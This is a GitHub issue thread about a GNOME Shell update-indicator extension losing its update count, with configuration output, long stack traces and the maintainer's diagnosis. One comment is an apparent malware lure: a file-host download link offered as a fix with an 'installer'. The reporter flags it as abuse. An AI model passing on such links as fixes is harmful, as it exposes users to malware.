### ISSUE TITLE
Update icon shows nothing in top bar even though there are pending updates

### ISSUE THREAD

**Issue by 2-4601** [RaphaelRochet/arch-update#242]
Apologies for not finding explicit reproduction steps for this issue.

After the timestamp feature was introduced in v62, I've started to encounter an issue where the number of updates vanishes from the top bar icon. For instance, right now I can see that there are 3 updates available. After a while the update count disappears as though there would be no updates available. If I issue the _Check now_ command manually from the menu, I get the update count (3) back.

Gnome shell started to output stack traces related to this extension after v62 was released in Aug 25th. I think they might be relevant to this. I have pasted the logs at the end.

#### Versions
Arch Linux Updates Indicator v62
GNOME Shell 46.4

#### Arch Linux Updates Indicator extension settings
```
$ dconf dump /org/gnome/shell/extensions/arch-update/
[/]
check-cmd='/bin/sh -c "checkupdates; paru -Qua"'
check-interval=60
linkify-menu=false
show-timechecked=true
strip-versions=false
update-cmd='gnome-terminal -- /bin/sh -c "sudo pacman -Syu ; echo Done - Press enter to exit; read _" '
use-buildin-icons=true
```

#### Log
```
Sep 04 14:58:36 gnome-shell[1614]: Object St.Icon (0x5ae9047a8a30), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cceca0 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:364 (2644952fbfb0 @ 56)
                                           #1   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:557 (30be2a6c150 @ 110)
                                           #2   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:271 (2644952fbd30 @ 17)
                                           #3   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:36 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupMenuItem (0x5ae9032b9350), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cceca0 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:365 (2644952fbfb0 @ 70)
                                           #1   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:557 (30be2a6c150 @ 110)
                                           #2   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:271 (2644952fbd30 @ 17)
                                           #3   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:36 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupBaseMenuItem (0x5ae9032b21e0), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cceca0 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:366 (2644952fbfb0 @ 86)
                                           #1   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:557 (30be2a6c150 @ 110)
                                           #2   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:271 (2644952fbd30 @ 17)
                                           #3   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:36 gnome-shell[1614]: Object St.Label (0x5ae9032c1070), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cceca0 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:374 (2b0cc72cb6a0 @ 68)
                                           #1   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:579 (30be2a6c150 @ 1101)
                                           #2   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:271 (2644952fbd30 @ 17)
                                           #3   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:36 gnome-shell[1614]: clutter_text_get_editable: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:36 gnome-shell[1614]: clutter_text_get_text: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:36 gnome-shell[1614]: clutter_text_set_text: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:36 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupMenuItem (0x5ae9032bec20), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cceca0 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:375 (2b0cc72cb6a0 @ 91)
                                           #1   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:579 (30be2a6c150 @ 1101)
                                           #2   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:271 (2644952fbd30 @ 17)
                                           #3   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:36 gnome-shell[1614]: Arch-update : next update check schedule in (seconds) 3599.999
Sep 04 14:58:36 gnome-shell[1614]: Arch-update : next update check schedule in (seconds) 3600
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupMenuItem (0x5ae9032b9350), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:368 (2644952fbfb0 @ 112)
                                           #1   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:610 (30be2a91790 @ 97)
                                           #2   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #3   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #4   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupBaseMenuItem (0x5ae9032b21e0), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:369 (2644952fbfb0 @ 128)
                                           #1   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:610 (30be2a91790 @ 97)
                                           #2   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #3   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #4   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.Icon (0x5ae9047a8a30), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:382 (2b0cc72ce6f0 @ 108)
                                           #1   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #2   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #3   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #4   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupSubMenuMenuItem (0x5ae9047ac9f0), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:455 (2b0cc72e4a10 @ 66)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.Icon (0x5ae9047b2120), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:456 (2b0cc72e4a10 @ 90)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.Label (0x5ae9047af2b0), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:457 (2b0cc72e4a10 @ 121)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: clutter_text_get_editable: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:37 gnome-shell[1614]: clutter_text_get_text: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:37 gnome-shell[1614]: clutter_text_set_text: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupSubMenuMenuItem (0x5ae9047ac9f0), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:458 (2b0cc72e4a10 @ 136)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.BoxLayout (0x5ae9047bc3e0), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:460 (2b0cc72e4a10 @ 205)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.BoxLayout (0x5ae9047bc3e0), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900ccedd8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:487 (2b0cc72fe290 @ 546)
                                           #1   7ffc95a0e2c0 b   self-hosted:203 (b324e497ba0 @ 245)
                                           #2   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:461 (2b0cc72e4a10 @ 231)
                                           #3   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #4   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #5   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #6   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #7   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.BoxLayout (0x5ae9047bc3e0), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900ccedd8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:487 (2b0cc72fe290 @ 546)
                                           #1   7ffc95a0e2c0 b   self-hosted:203 (b324e497ba0 @ 245)
                                           #2   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:461 (2b0cc72e4a10 @ 231)
                                           #3   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #4   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #5   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #6   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #7   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.BoxLayout (0x5ae9047bc3e0), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900ccedd8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:487 (2b0cc72fe290 @ 546)
                                           #1   7ffc95a0e2c0 b   self-hosted:203 (b324e497ba0 @ 245)
                                           #2   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:461 (2b0cc72e4a10 @ 231)
                                           #3   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #4   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #5   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #6   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #7   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupMenuItem (0x5ae9047c3060), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:494 (2b0cc72e4a10 @ 253)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupMenuItem (0x5ae9047c3060), has been already disposed — impossible to get any property from it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:496 (2b0cc72e4a10 @ 269)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupMenuItem (0x5ae9047c3060), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:497 (2b0cc72e4a10 @ 306)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupSubMenuMenuItem (0x5ae9047ac9f0), has been already disposed — impossible to get any property from it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:501 (2b0cc72e4a10 @ 361)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_ui_popupMenu_PopupSubMenuMenuItem (0x5ae9047ac9f0), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e990 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:502 (2b0cc72e4a10 @ 398)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:383 (2b0cc72ce6f0 @ 159)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.Label (0x5ae9047aa590), has been already disposed — impossible to access it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:384 (2b0cc72ce6f0 @ 192)
                                           #1   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #2   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #3   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #4   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: clutter_text_get_editable: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:37 gnome-shell[1614]: clutter_text_get_text: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:37 gnome-shell[1614]: clutter_text_set_text: assertion 'CLUTTER_IS_TEXT (self)' failed
Sep 04 14:58:37 gnome-shell[1614]: Object .Gjs_arch-update_RaphaelRochet_extension_ArchUpdateIndicator (0x5ae9047a0280), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e9a0 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:316 (2644952fbdd0 @ 150)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:446 (2b0cc72ce6f0 @ 1116)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
Sep 04 14:58:37 gnome-shell[1614]: Object St.Label (0x5ae9047aa590), has been already disposed — impossible to set any property on it. This might be caused by the object having been destroyed from C code using something such as destroy(), dispose(), or remove() vfuncs.
                                           == Stack trace for context 0x5ae900be63f0 ==
                                           #0   7ffc95a0e9a0 b   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:318 (2644952fbdd0 @ 203)
                                           #1   5ae900cced18 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:446 (2b0cc72ce6f0 @ 1116)
                                           #2   5ae900ccec78 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:614 (30be2a91790 @ 200)
                                           #3   5ae900ccebb8 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:599 (30be2a8b0b0 @ 332)
                                           #4   5ae900cceb38 i   file:///home/2-4601/.local/share/gnome-shell/extensions/arch-update@RaphaelRochet/extension.js:568 (30be2a7c6f0 @ 12)
                                           #5   5ae900cceaa8 i   resource:///org/gnome/shell/ui/init.js:21 (b324e470bf0 @ 48)
```

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by 2-4601** [comment]
> try this <link redacted> select the desired compiler in the installer

Nice try. Reported as abuse. Hope you get your account back from whoever has compromised it.

**Comment by RaphaelRochet** [comment]
Hi, thanks for your report.

Reading the log, I can tell that somehow the indicator has been unloaded and thus any action that try to update its appearance and menu are failing. Common cases are when screen is locked, or extension is disabled/enabled. 
Last release included a major change in how the timer was handled, maybe I missed an edge case somewhere.

